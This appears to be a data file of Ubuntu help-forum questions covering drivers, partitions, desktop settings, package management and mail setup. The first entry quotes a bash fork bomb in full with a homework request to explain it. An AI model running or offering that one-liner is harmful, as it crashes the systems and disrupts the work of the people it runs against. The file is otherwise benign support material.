47685	understanding this shell statement	i admit it is a homework but i am lost in explaining the following command line : warning : this is a so called fork bomb ! this command line can and will crash your pc by consuming all ram and cpu ( trust me , i tried it ... ) : ( ) { : | : & } ; : as i know that i should do it alone here is what i have so far ( searching for these chars is very discouraging ) . the pipe enables to concatenate some commands together so that the first output is used by the second as input . the & is to run a command in the background ( basically used to start something from a shell which should n't be blocked by the command ) i guess that : is to fork ? but here i am totally lost ! i am willing to learn , so maybe someone have a good resource where i can read about that ?
47686	triggering a ui message based on a terminal ssh 'd to another server	i am working in a multi-workspace multi-window configuration . i am constantly running scripts behind the scenes . it would save me a lot of time and context switching if i could kick off a script on another server and have a message popup ( growl notify or w/e ) on my desktop letting me know that the command finished . is there a way to do that in ubuntu 10 ?
47688	mail ( 1 ) is n't able to open maildir mailbox	i 'm having to set up an email server for a class and have installed exim ( using maildir mailbox format ) and sent myself an email . i ca n't read the email though : i have set the mail variable to ~/maildir but when i try to open mail i get pad-20 @ pad-20 : ~ $ mail mail : /home/pad-20/maildir/ : is a directory i also changed the settings in /etc/pam.d/ { login , su , sshd } according to this guide , but all that 's done is give me a new email summary when i log in . the strange thing is that frm works : pad-20 @ pad-20 : ~ $ frm test 2 from telnet ( that 's the subject of the test email i sent ) . there is another question on askubuntu that is similar , except that their problem was fixed after setting the mail variable correctly .
47691	how to enlarge indicators and window buttons in unity ?	i have recently installed ubuntu 11.04 and i really like it . my only gripe is that some gui elements are too small on the screen . ( my screen resolution is 1920 x 1200 . ) over the last few days , i have been trying to customize the interface with various tools ( gnome color chooser , compizconfig , gconf editor ) , but i have n't managed to find any solution . what i would like to change in particular is the panel indicators and window buttons : if possible , i 'd like to keep the default theme . by the way , thank you for being here and helping other users ! : )
47693	how can i get the default files .. networks / hosts / resolve / and whatever else i changed to try and get up my webserver ?	does anyone have the original.. default hosts file , resolve file.. and networks file ? please someone help me get these back to normal so i can put up a web-server . i 'm tired , just to set up a web-server .
47696	x freeze when system wakes up	two machines : laptop : when i close the lead and open it again i see the last status of the desktop and i have control over the mouse . this seems to also happen with the screen saver ( shut off screen ) . desktop : when the restoring the machine from screen saver ( shut off screen ) , the same symptoms as the laptop . it seems that the machine response to input through the mouse ( clicking on a song in a playlist plays that song ) . it also seems that this mostly happen when clemantine window is open or when a website which has jsplayer embedded in it . both machine run ubuntu natty .
47697	incorrect screen resolution on login on a macbook pro 7.1	i 'm having trouble with x11 ... when i restart my laptop , the screen resolution is always reset to 1024x768 . i set the resolution to the appropriate 1280x800 and everything is fine for that session , until i restart or re-login . then the screen is reset back to 1024x768 . saving the x configuration file after resetting the resolution does n't help . i 'm using nvidia 's `` current version '' in the addtional drivers and making changes qwith `` nvidia x server settings '' ubuntu 11.04 macbook pro 7.1 any ideas about what i could do to fix this ? thanks
47700	fix corrupt ntfs partition without windows	my ntfs partition has gotten corrupt somehow ( it 's a relic from the days when i had windows installed ) . i 'm putting the debug output of fdisk and blkid here . at the same time , any os is unable to mount my root partition , which is located next to my ntfs partition . i 'm not sure if this has anything to do with it , though . i get the following error while trying to mount my root partition ( sda5 ) mount : wrong fs type , bad option , bad superblock on /dev/sda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ubuntu @ ubuntu : ~ $ dmesg | tail [ 1019.726530 ] descriptor sense data with sense descriptors ( in hex ) : [ 1019.726533 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 1019.726551 ] 1a 3e ed 92 [ 1019.726558 ] sd 0:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed [ 1019.726568 ] sd 0:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 1a 3e ed 40 00 01 00 00 [ 1019.726584 ] end_request : i/o error , dev sda , sector 440331666 [ 1019.726602 ] jbd : failed to read block at offset 462 [ 1019.726609 ] ata1 : eh complete [ 1019.726612 ] jbd : recovery failed [ 1019.726617 ] ext4-fs ( sda5 ) : error loading journal when i open gparted ( using live cd ) , i get an exclamation next to my ntfs drive which states is there a way to run chkdsk without using windows ? my attempt to run fsck results in the following : ubuntu @ ubuntu : ~ $ sudo fsck /dev/sda fsck from util-linux-ng 2.17.2 e2fsck 1.41.14 ( 22-dec-2010 ) fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sda the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > update : i was able to fix the ntfs partition running chkdsk off hbcd , but it seems that the superblock problem still remains . *update 2 : * fixed superblock issue using e2fsck -c /dev/sda5
47702	tell `ls` to sort by regular ascii codes , not `` intelligently ''	i have a couple files and ls sorts them like this : a _b c but i want to have _b a c how can i do that ?
47705	thinkpad t410 abnormal power consumption and brightness keys behaviour	i 've recently installed 11.04 on a fresh lenovo thinkpad t410 with a 9-cell battery , but it totally drains up from full battery after about 2:30 - 3:00 hours of normal use ( mainly web surfing ) . the other problem is that brightness keys are detected , but not working . when i increase/decrease brightness , the notification appears ( and it shows that it 's been increased/decreased ) but nothing changes . how can i resolve this issue ? is there a human-friendly solution ? is there any plans to solve this problem out-of-the-box in next releases ?
47712	music player that works with a large library of music files	i 'm looking for a fast and functional music player that can work with a huge library of music files . banshee is quite ok , however it uses too much resources on my laptop and hangs from time to time . probably because of my huge library . rhythmbox was even worse . exile got broken after some time . is there a player that can scan and manage 85 gb of music without much problems ? maybe something like foobar2000 for windows ?
47715	copy hyperlinks in libreoffice	i face the problem that i need to copy a list of hyperlinks from libreoffice calc to an html file : i created the list in libreoffice calc ( 3.3.2 ) with the function hyperlink ( link-text ; link-url ) . the links work in the spreadsheets . until now i have not found any way to copy such a link ( link-text not equal link-url ) or the list of links to any other document . i tried : copy/paste special in office calc copy/paste to writer upload the spreadsheet to libreoffice base save the file as html copy/paste into an html editor . - > only the url-text gets copied but never the link . i appreciate any help !
47717	how do i find out what amazon has stored ?	i would like to control/recover/delete files on amazon . how is this done ?
47718	ca n't use a particular partition for ubuntu installation	i am trying to install ubuntu 10.04 as a second os on a laptop that has windows 7 . in windows , i have created the below partitions : c : - > ntfs - 52gb ( windows installation ) d : - > ntfs - 94gb e : - > ntfs - 82gb user data u : - > ntfs -20gb this is where i want to install ubuntu on . in the ubuntu install/setup process ( using a 10.10 live flash memory ) , the last partition ( on u : ) is not shown separately , but seems to be grouped together with the other ntfs partition.therefore , i ca n't choose the 50gb partition as the linux installation root . i tried leaving the partition as unallocated space ( unformatted without any file system written on it ) but ubuntu still did not recognize it during installation . 1.how can i format this 50gb partition in windows ( either using windows disk manager or some other disk partitioning tool ) so that ubuntu setup can see this partition as a distinct one and allow me to install linux on it ? 2.can i format this 50gb partition as ext2/3/4 help ? if yes , what tool on windows can allow me to do that ? 3.what other solutions do i have to install ubuntu , whilst maintaining my windows 7 partitions ? thank u very much .
47723	what e-mail clients are available ?	what the best e-mail clients are available and integrate well with ubuntu . including the features : support of notifcations for messages/news ( rss ) . integrate well with the events in the time/date indicator what e-mail services do they support ? etc . edit : despite the features included above , i want a list of all the e-mail clients available to use , and if possible to make it a community-wiki post for each answer one email client .
47724	is it possible to replace notify-osd with gnome 3 indicators ?	i have gnome shell installed in ubuntu 11.04 fully . it still , however , uses the ubuntu notification rounded transparent rectangle notifiers at the top right of the screen . what i want is for it to use the default gnome shell indicators , those that use the tray and hot corner at the bottom right of the screen . is this possible ? if so , how ?
47745	automatically start at specific time like bios ?	some bioses have an option to start the computer from a fully off state ( not suspended ) at a specific 'alarm ' time . is there any command or way to set this in ubuntu without restarting and going to the bios ? ( i have a server+router running for a school network and sometimes some random ( well intentioned ) people think it needs to be off at the end of the school day . i figure the best way to avoid getting calls at random times that the network quit working is to have a cron job every minute that sets the 'alarm wake ' time as 2 minutes from now . that way it would auto start itself . )
47746	anyone have the aspeed ast2050 vga working from a tyan s7025 ?	i have an ubuntu natty 64bits installed ( server edition with ubuntu-desktop installed to have gnome-desktop there ( with no suggested packages ) on a server using a tyan s7025 board with an ntegrated vga aspeed ast2050 . the vga works with a correct resolution , but it 's very ( really ) slow . i 've searched for the xserver-xorg-video-ast module , but it does n't exists in the repositories . xorg logs complains about the lack of the ast module to be loaded . do you have this vga working somehow ? thanks a lot .
47747	can i configure a transparent terminal over my wallpaper ?	can i make a transparent terminal wallpaper on my desktop ? i 've done this in the past but ca n't remember what i did .
47748	how do i assign an address-book admin for openldap ?	i 'm new to openldap but through tutorials and documentation i have been able to setup a ldap addressbook where users can retrieve email addresses and mobile numbers with their email clients ( thunderbird , outlook ) . i was the one who created the entries from scratch with the ldap manager . i want to create a phone-book entry for just name and numbers and then pass on the responsibility of keeping the phone-book updated to someone else . how can i assign a user read+write privileges so ( s ) he can be the administrator for the ou=phone-book section of ldap ? . my setup is like this : ou=people - email , name , number , address , job title , etc . ou=phone-book - phone numbers and names ou=users - ldap users who login to read the address-book anonymous now allowed
47758	how can i move compilation albums into a `` various artists '' folder ?	currently my music is sorted like this : music ├── artist 1 │ ├── album 1 │ └── album 2 ├── artist 2 │ ├── album 3 │ ├── album 4 │ └── album 5 ├── artist 3 │ └── album 5 ├── artist 4 │ └── album 5 └── artist 5 └── album 5 what is the easiest way to reorganize it like this ? music ├── artist 1 │ ├── album 1 │ └── album 2 ├── artist 2 │ ├── album 3 │ └── album 4 └── various artists └── album 5
47759	unity `` execute '' dialog does n't accept special characters	why does n't the `` execute command '' dialog ( alt+f2 ) accept special characters composed by '+a ( `` á '' ) , +e ( é ) , etc . in unity ? i 'm running natty with unity 3.8.12 .
47760	unity launcher for kde	i 'm a kde user which is currently using unity . i really liked the unity launcher , but really prefer the kde desktop . so , i was wondering whether there 's a chance that a kde plasmoid which implements the unity launcher to be developed . things like having launchers and running applications combined , and ideally supporting all other unity features ( like quick lists , counters , progress bars ) . i think the same way canonical developed a global menu plasmoid , having an unity launcher plasmoid would be a great addition as well . i know the unity 2d launcher can be installed in kde , but it is a total alien there , so i do n't consider it as an alternative in it 's current form ...
47765	switching tty shortcut	i recently installed ubuntu natty ( 11.04 ) and now pressing alt+left/right arrow key switches my tty to the adjacent one . how can i reconfigure the keyboard shortcuts so that this stops happening ? update : i enabled ctrl-alt-backspace restarting x . now when i start my computer and then restart x , this problem stops occurring . however , if i do n't restart x after starting my computer , this problem persists . another update : reinstalling the system fixed the problem .
47766	how can i use tab completion in the 'run a command ' box ?	i finally upgraded to ubuntu 11.04 and so far , i am liking the experience . the only thing i have a problem with , is : while in the execute dialog , i ca n't complete the path with tab like i could do in 10.10 is anybody having any fix for this ?
47775	how can i set the 'path ' variable in a .desktop file to be relative to the location where the desktop file is located ?	i want to set the 'path ' variable in a .desktop file relative to the location where the desktop file is located and i ca n't manage to do that . when i do n't declare it or set it to blank it defaults to my home folder no matter where i run it from ; and it does n't accept values relative to my current location within the file system .
47781	what is the syntax for vuze ( azureus 4 ) quicklist	i am trying to make a quicklist for vuze with pause and resume but ca n't seem to get the syntax right any help would be greatly appreciated
47787	survive hard reboot	i have ubuntu running on a computer that is going to be part of a public exhibition . the problem is that the power is shut down each night and restarted in the morning . my question is what i can do to limit the damage this will do to the system ? is it possible to write protect the system hard drive ? can i somehow restore the system from a secondary hard drive on every reboot ? any suggestions ?
47790	using the `` dash '' from unity interface in classic mode ?	i 've so far opted out of the complete unity experience , preferring the ubuntu classic ( gnome-shell ) on my desktop . however , unity 's `` dash '' ( the thing that opens from the ubuntu button in the top-left corner ) seems interesting , especially the `` more apps '' -functionality that displays shortcuts to software center alongside with already installed apps . can that part of unity be used with ubuntu classic 11.04 without running into all sorts of conflicts and problems ? how ?
47796	can i update the kernel of my 10.04 lts to the latest kernel ?	i want to update the kernel version of my current 10.04 lts to at least 2.6.37 ( because the drivers for my eth0 and wlan0 interfaces are included in the said kernel ) . if it is possible , how do i do this ? is there a repo i add to my sources list ?
47800	`` command not found '' when running a script via cron	i want to run my script in crontab , but i have some problems ... in my script i run this command : db2 connect to mydb2 this works fine when i run this as db2inst1 user , but when i run this script in db2inst1 crontab , i get this : db2 : command not found . how can i solve this ?
47805	error in version string 'v1.4 ' : version number does not start with digit ;	i am trying to install bulkr , an adobe air application for downloading flick photos in ubuntu 11.04 but the installation fails with an error dialogue box that says `` the application could not be installed . try installing it again . if the problem persists , contact the application author . error # 1 '' . main highlight of the error log files are : error : only root can install the application '' error : dpkg : error processing /tmp/flashtmp.hhlatv/setup.deb ( -- install ) ... ... error in version string 'v1.4 ' : version number does not start with digit ; i am able to install & run bulkr in ubuntu 10.04 . so , is this an issue with bulkr application version number not being compatible for ubuntu 11.04 ?
47807	skipping intermediate ubuntu os upgrade to latest one , how do i upgrade from 9.04 to 10.04.2 ?	i 'm currently runing ubuntu 9.04 jaunty . i want to upgrade to 10.04.02 , but whenever i use the update manager to do this , it fails with the error `` an upgrade from 'jaunty ' to 'lucid ' is not supported with this tool '' . i also tried to run sudo do-release-upgrade -d , but it fails with the same error message : checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading extracting 'lucid.tar.gz' authenticate 'lucid.tar.gz ' against 'lucid.tar.gz.gpg' tar : removing leading `/ ' from member names reading cache checking package manager can not upgrade an upgrade from 'jaunty ' to 'lucid ' is not supported with this tool .
47809	what gimp tutorials are available ?	where can i get some gimp tutorials ?
47813	dual screen monitor not working after 11.04 upgrade	launchpad bug # 794975 i have a nvidia geforce 8600 gt video card . i 'm not using closed source drivers ( so i 'm using what ever the default ubuntu/linux drivers are ) . i have 2 monitors plugged in the back of them . both monitors worked out of the box with no extra settings needed . today i upgraded to ubuntu 11.04 and the dual monitors do n't work . only one monitor works . here 's some hardware information $ sudo lshw -c display *-display description : vga compatible controller product : g84 [ geforce 8600 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f2000000-f2ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport:1100 ( size=128 ) and $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g84 [ geforce 8600 gt ] [ 10de:0402 ] ( rev a1 ) and $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 0mm x 0mm 1280x1024 50.0* 51.0 1280x960 52.0 1152x864 53.0 54.0 55.0 56.0 1024x768 57.0 58.0 59.0 960x600 60.0 960x540 61.0 840x525 62.0 63.0 64.0 65.0 832x624 66.0 800x600 67.0 68.0 69.0 70.0 720x450 71.0 700x525 72.0 73.0 680x384 74.0 75.0 640x480 76.0 77.0 78.0 79.0 80.0 512x384 81.0 82.0 400x300 83.0 320x240 84.0 85.0
47814	nautilus preferences and menu missing	my nautilus does not show a preferences button or file/edit etc when i hove over the left top . i recently did a clean install of ubuntu natty narwhal 11.04 . what happened and how can i fix this ? see screnshot here
47815	where can i find the default printing test page ?	where can i find the default test page in ubuntu ?
47816	what can i do about rsync of large files killing my laptop 's wifi connection	when i run a rsync to backup my home folder over the network like so : rsync -avhz -- progress -- delete /home/dbdean/ david @ tv.local : /home/backups/david/ i seem to have problems with my quite large .virtualbox/harddisks/windows xp.vdi file . occasionally the wifi will silently fail ( the transfer stops , and any other network access is broken ) . if i reconnect the wifi to my network before the transfer times out , it happily keeps going ( and other network access is back ) , but i ca n't just leave it unattended most of the time , as i have to keep an eye on it . i 'm guessing this is probably a bug in the wireless card related to a particularly high sustained volume of network usage , but i 'm not really sure where to start with diagnosing this problem so that i can provide a good bug report . or it could be something else , i guess . any help would be appreciated . my network card is an atheros communications inc. ar9285 , as lspci -k shows : 43:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : hewlett-packard company device 3040 kernel driver in use : ath9k kernel modules : ath9k
47825	tool to complete words while typing	i have a friend who is familiar with etype . this application helps him by completing and suggesting words while he 's typing . now he is using ubuntu by my suggestion but he really needs this application on ubuntu . since there is no etype ubuntu version , is there a similar application for ubuntu ? what do you suggest guys ? the application should work on : browsers ( firefox , chromium ) on word processors like ( libreoffice , openoffice )
47827	does banshee support last.fm ipod scrobbling ?	does banshee support last.fm ipod scrobbling ? rhytmbox does !
47831	how to remove gvim 's fat bottom border ? ( and resize grip )	so my gvim has this annoying bottom border : i wish it did n't and looked more like gnome-terminal for example : is there any way for gvim to look like that ? update : there is ! here 's a screenshot after adding settings from jeremy cantarell 's and my own answer :
47832	upgrade linux kernel to 2.6.39.1 ?	can i upgrade my linux kernel 2.6.38 to the new one 2.6.39.1 ? is it safe and stable to upgrade it in my ubuntu natty ? thnx !
47842	problems to boot on natty with kernel 2.6.39.1	i 've installed this new kernel version ( 2.6.39.1 ) and it seems to me that is n't stable . when i boot my laptop it blocks ... . and it shows a fail on graphics ... what is the problem ? i 've installed proprietary drivers fglrx . my laptop is a acer aspire 5542g amd64 bits ati radeon hd4570 4gb memory i 'll wait for an answer , please ... here it is my proprietary graphics : this installation problem shows me this :
47847	can not boot live cd , various errors ( sometimes kernel panic , sometimes it goes to busybox )	i want to install ubuntu 10.04.2 on laptop , but first time i run ubuntu live cd it runs perfect , but when a rebooted the live cd do n't want to boot anymore . live cd sometimes gives kernel panic ( kernel panic - not syncing attempted to kill init ! ) , sometimes it goes to busybox . i also tried with acpi=off option , but still kernel panics or dropping to busybox . live cd is ok , because i already installed ubuntu on some computer from the same cd . i tried with ubuntu 11.04 live cd , but this version also gives kernel panics . i also tested memory with memtest and computer past the test without errors . because the laptot have only 512 mb of ram i tried to install lubuntu 10.04 , but when i boot lubuntu from live cd it gives me kernel panic ( ( process:289 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) , num lock light is blinking ) i sometimes get errors like authentication failure , input/output error or squashfs error : unable to read data cache entry [ c4d70c8 ] squashfs error : unable to read page , block c4d70c8 , size e046 the laptop is acer aspire 5100 and it has : amd turion 64 ( 2.0 ghz , 512kb l2 cache ) ati mobility radeon x1300 128mb 60gb pata hdd 512mb ddr2 other things , like wlan , bluetooth and so on this laptop have windows xp installed , but they are slow as hell ( so slow , that they are impossible for normal use ) , so i want to install ubuntu or lubuntu , but it gives me various errors , while i am attempting to at least run live cd . should i try with live usb ? any help is appreciated . : ) update : i also tried fedora 15 ( with gnome shell ) right now and it boots . why the hell ubuntu do n't want to boot ? update2 : it looks like the ubuntu 10.04.2 , ubuntu 11.04 and lubuntu 10.04 cds are damagaed , acording to cd files check . but before i used this cds on various computers , they just works . there must be something wrong with dvd-rom on this laptop , because those cds were ok before i tried it on this laptop . i am now downloading ubuntu 10.04.2 iso image and i will make a liveusb and then i will post results .
47850	is it possible to install a repository via a web ( clicking in a webpage link )	i know it is possible to install an app from the software center via clicking an apt link in a web page . but is it possible to install a repository by clicking also ? for example when a user clicks on a link it does this : sudo apt-add-repository ppa : ubuntu-wine/ppa but by clicking on a link
47851	degrade from ubuntu 11.04 to 10.04	i want to degrade my ubuntu from 11.04 to 10.04 . after upgrading i am facing series of problems : ( . its sometime logged out automatically . its freeze sometime . i do n't want to debug the things any more . now a days i spend most of the times for debugging os problems . in my ubuntu 10.04 i am not face any bigger problems . is there any way to degrade to 10.04 or 10.10 ... ? fyi my hardware configuration is i am using acer 5740 .
47854	run a line command from a web ( clicking in a webpage link )	is it possible to execute a command from a single link ? for example when a user clicks on a link it does this : sudo apt-get install vlc wine openshot but by clicking on a link
47856	how to get to know the information about a package before installation in terminal	i was wondering how to get the information about a package in terminal , before installation with apt-get install so that i can decide whether to install it , based on the description . thanks and regards !
47857	stop and start desktop couch with `` service '' ?	i think i 'm hitting the same error as evolution has no access to couchdb but the first step in the solution is to `` stop desktopcouch service '' service does n't know desktopcouch ( or couch , as far as i can tell ) . ps shows a number of couch instances running . i could just kill them all by process id , but that seems like a hack . amanda 4290 0.0 0.0 1896 592 ? s 10:16 0:00 /bin/sh -e /usr/bin/couchdb -n -a /etc/couchdb/default.ini -a /etc/xdg/desktop-couch/compulsory-auth.ini -a /home/amanda/.config/desktop-couch/desktop-couchdb.ini -b -r 0 -p /home/amanda/.cache/desktop-couch/desktop-couchdb.pid -o /home/amanda/.cache/desktop-couch/desktop-couchdb.stdout -e /home/amanda/.cache/desktop-couch/desktop-couchdb.stderr -r amanda 4314 0.0 0.0 1896 304 ? s 10:16 0:00 /bin/sh -e /usr/bin/couchdb -n -a /etc/couchdb/default.ini -a /etc/xdg/desktop-couch/compulsory-auth.ini -a /home/amanda/.config/desktop-couch/desktop-couchdb.ini -b -r 0 -p /home/amanda/.cache/desktop-couch/desktop-couchdb.pid -o /home/amanda/.cache/desktop-couch/desktop-couchdb.stdout -e /home/amanda/.cache/desktop-couch/desktop-couchdb.stderr -r amanda 4315 3.0 0.6 81816 19376 ? sl 10:16 1:55 /usr/lib/erlang/erts-5.7.4/bin/beam.smp -bd -k true -a 4 -- -root /usr/lib/erlang -progname erl -- -home /home/amanda -- -noshell -noinput -sasl errlog_type error -couch_ini /etc/couchdb/default.ini /etc/xdg/desktop-couch/compulsory-auth.ini /home/amanda/.config/desktop-couch/desktop-couchdb.ini -s couch -pidfile /home/amanda/.cache/desktop-couch/desktop-couchdb.pid -heart amanda 4334 0.0 0.1 20448 3552 ? ssl 10:17 0:00 /usr/lib/couchdb/bin/couchjs /usr/share/couchdb/server/main.js amanda 4519 0.1 0.4 19216 12568 ? s 10:29 0:05 /usr/bin/python /usr/lib/desktopcouch/desktopcouch-service amanda 4548 0.2 0.4 19824 12356 ? sn 10:29 0:07 /usr/bin/python /usr/lib/desktopcouch/desktopcouch-service amanda 5841 0.0 0.0 4012 756 pts/3 s+ 11:19 0:00 grep couch what 's the right way to start and stop desktopcouch in 10.10 ?
47864	how to update eclipse 3.5.2 to 3.6.2 ?	i want to develop swing applications using the visual editor in eclipse , but it need eclipse 3.6 . but it is already up-to-date using synaptic package manager . is there a separate ppa for the version 3.6 ?
47865	how do i use apt-get to only download packages ?	i have apt-get 0.7.23.1 on host machine . i do not have root , thus not able to update it , or install other packages . i want to download .deb packages with it , but neither apt-get -d bash ( invalid operation bash ) nor apt-get -d install bash ( do not have root ) work . on my home machine with a newer version of apt-get i can apt-get download bash and it does exactly what i want it to . how can i perform the same on the host machine ?
47866	new to virtualbox with basic questions	i currently have a dual boot 120 gb hdd , with windows xp on sda1 , linux ( ubuntu 11.04 ) os on sda6 and linux /home on sda7 partitions . when i want to use the only remaining windows program that i need ( mmoney ) , i boot into my existing windows partition . i want to cease using windows because i do not want to continue to have to maintain and update windows security and other patches or worry about security breaches . i have given up on wine ( very frustrating ) . so i thought i 'd install windows xp as a guest os in virtualbox . in so doing , here are my basic questions : 1 ) if i install xp as a guest op in virtualbox , will i still need to maintain/update windows regularly as i do now on its existing sda1 partition to keep it secure ? 2 ) is it recommended/better to install virtualbox on a new , separate partition instead of on my current sda7 ( /home ) partition ? 3 ) does virtualbox really require a minimum 20gb hdd space ? 4 ) does the memory dedicated to virtualbox reduce the memory available to windows only when running a virtualbox machine , or all the time ? anything else i should know ? thanks for helping out a beginner !
47867	what pre-requisites do i need to install drbd8 ?	i have been trying forever to get drbd set up in our office , and i can not figure it out . i 'm starting from the very basics . i am using two vm 's to test out setting up drbd , so they will be fresh installs . what specific packages do i need to download to drbd off the ground ? thanks for the help .
47868	what is unity going to do about application menus ?	gnome shell makes use of a single application menu that is always present in the top bar . it gets its contents via gtkapplication . in the current stable version nothing really uses it , but for gnome 3.2 that will probably be changing . for example , a mockup for gnome contacts has an application menu that is mandatory to use the application to its fullest : http : //afaikblog.wordpress.com/2011/06/09/presenting-gnome-contacts/ are there any plans for how unity will accommodate this ?
47873	check if ip is static or dynamic programmatically	i 'm trying to determine whether my ip has been statically or dynamically assigned in ubuntu 11.04 from within c. the closest i 've come is examining /var/lib/dhcp/dhclient.leases , but that does n't change if a static ip is assigned ( as it caches dhcp leases for future connection attempts ) . so ... is there a command line utility ( for ubuntu ) that will allow me to check if dhcp is enabled or disabled ? alternatively : the machine is a server dedicated to one application ; would it be easier just to maintain an environment variable that keeps track of dhcp status ?
47875	graphics problems with applications	for some reason , i 've got some graphical issues sometimes . mostly with abiword , libreoffice ( and openoffice.org ) , and wine applications . i 've added some screenshots below t oclarify a bit . this is not a problem that recently popped up . as a matter of fact , i 've always had it since ubuntu 8.10 , and there never came an update to fix it . i 'm currently using linux mint 10 ( based upon ubuntu 10.10 ) , but as i already said , that does n't really say much as i'va also had this problem with linux mint 8 , ubuntu 8.10 , ubuntu 9.04 , ubuntu 9.10 and ubuntu 10.04 . it was never a big problem , as i rarely used any text processing programs . but recently , i 'm starting to use them more and more , and it 's really annoying being unable to work because of this problem . when i first open an application , everything looks normal , then after a while ( when i highlight , click , ... an item ) they 'll suddenly screw up . this also happens when i move or resize the window . sometimes when this happens , i can just minimize the window , and when i restore it , sometimes it will be gone ( for a few seconds at least ) or it will have changed positions . i 'm using the nvidia-current graphics card driver . but i have also always had this problem on my old computer , wich used ... i think nvidia-96 . screenshots ( i 've done the blur myself , so that 's not the issue , the problem is that blue crap )
47878	access denied errors when accessing files on a samba share	i am using samba / ubuntu server in my company with multiple groups and users . there are lots of permissions which i have already configured . i am having problem with partners user and client user , partners having certain privileges which clients does not have . i am having problem is that when any of the partner will save any file in server the client can open it but when they make a change on it they are unable to save the same file again in server , they will get an error like “permission : access denied” . i am not getting the problem , when client will save file they are having all the rights but the problem is with partners groups . so please can you help me regarding my problem for this how can i solve this type of error . it’s a server problem or any local machine problem , please help me and reply me as soon as possible…… thanking you… .
47880	ca n't open evolution couchdb address book	unable to open address book this address book can not be opened . this either means that an incorrect uri was entered , or the server is unreachable . i tried the solution ( and suggestions ) in evolution has no access to couchdb but that is n't working for me . i tried stopping desktopcouch-service and deleting my access keys and now the error i get says unable to open address book this address book can not be opened . this either means that an incorrect uri was entered , or the server is unreachable . detailed error message : address book does not exist do i need to create my addressbook anew ?
47881	brother mfc-295cn scanner	i have managed to add my mfc-295cn printer to my ubuntu 11.04 desktop . however , i need some help adding the scanner . from the brother website i am instructed to install the driver step 4-3 ) command ( for dpkg ) # dpkg -i -- force-all ( scanner-drivername ) and the example given is : dpkg -i brscan-skey-0.2.1-1.i386.deb selecting previously deselected package brscan-skey . ( reading database ... 89058 files and directories currently installed . ) unpacking brscan-skey ( from brscan-skey-0.2.1-1.i386.deb ) ... setting up brscan-skey ( 0.2.1-1 ) ... with terminal i can add ppa 's and remove programs but this is very confusing to me . do i write the ' # ' ? do i need to type 'sudo ' ? fyi i need to download the brscan3 driver . please help me with this , once i get this i wo n't need windows 7 really anymore , being able to scan from ubuntu would be a huge win . thank you , dustin
47883	should i dual boot on a toshiba satellite c645 ? ( win7 starter / ubuntu 11.04 )	although , i do n't like windows 7 starter , i have to keep it for some programs that wo n't run on linux . so , i was wondering if i could dual boot and install ubuntu 11.04 as my main os and , if i do so , i will still be able to go back to windows with the recovery cds included with the laptop .
47884	how to restrict user 's access to the internet for time intervals ?	i want that one of the users ( not in the sudoers list ) have internet access from 14:00 until 16:00 and from 17:00 until 18:30 . is it possible ? can i set different time intervals for different week days ?
47886	why is this package not shown in synaptic package manager	i was wondering why this package is not found in synaptic package manager : http : //manpages.ubuntu.com/manpages/maverick/man1/any2djvu.1.html , while it is shown in http : //manpages.ubuntu.com/ . my os is 10.10 . thanks and regards !
47891	dpkg -- print-avail package fails	i just happened to notice that dpkg -- print-avail package ( same as dpkg -p package ) is failing on my ubuntu 10.04.2 server . should i be concerned ? for example : $ dpkg -p a2ps package `a2ps ' is not available . but : $ dpkg -l a2ps desired=unknown/install/remove/purge/hold | status=not/inst/cfg-files/unpacked/failed-cfg/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===============-===============-============================================== ii a2ps 1:4.14-1 gnu a2ps - 'anything to postscript ' converter also , apt-cache show a2ps , recommended in the dpkg manual for `` users of apt-based frontends '' ( like me ) , does work . based on these bugs , i 'm guessing it does n't matter that dpkg -p package fails : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=43573 http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=137128
47897	is it possible to automatically nofity for update of manually installed packages ?	if having installed some packages downloaded from website , i was wondering if it is possible to have auto notification when its update is available , just as those packages in ubuntu repositories . can the packages downloaded be in deb form , or even in source code ? for example , nevernote maintained in sourceforge , http : //nevernote.sourceforge.net/index.htm , downloadable from http : //sourceforge.net/projects/nevernote/files/current/nevernote-0.99_i386.deb/download packages from ubuntu ppa https : //launchpad.net/ubuntu/+ppas .
47898	why ca n't i completely remove any applications ?	i am trying to completely remove some of the applications , using synaptic package manager , that i have uninstalled in ubuntu 11.04 . i 'm pretty sure i am doing everything correctly . i check the application as `` mark for complete removal , '' but the apply button stays unclickbable . i also tried 'sudo apt-get purge ( application ) ' , and that is n't doing it either . is this a bug or what ?
47901	can i install edubuntu in windows using wubi ?	edubuntu website offers two possible downloads , x86 and 64 bit . i need to be able to install edubuntu on a computer with no internet access and allow it to run within windows xp . i can not do this as a dual boot installation due to policy limitations . i can put the .iso on the computer , and i can put wubi in the same folder . when i run wubi , it does not give me the option to install from the downloaded edubuntu 11.04 .iso ( either version ) . i can also open the edubuntu .iso and view the various files . the wubi is not an included file in this .iso . is there a downloadable version of edubuntu that includes wubi ? or is there a way to force wubi to install from the available downloaded version of edubutu ? thank you very much for your assistance .
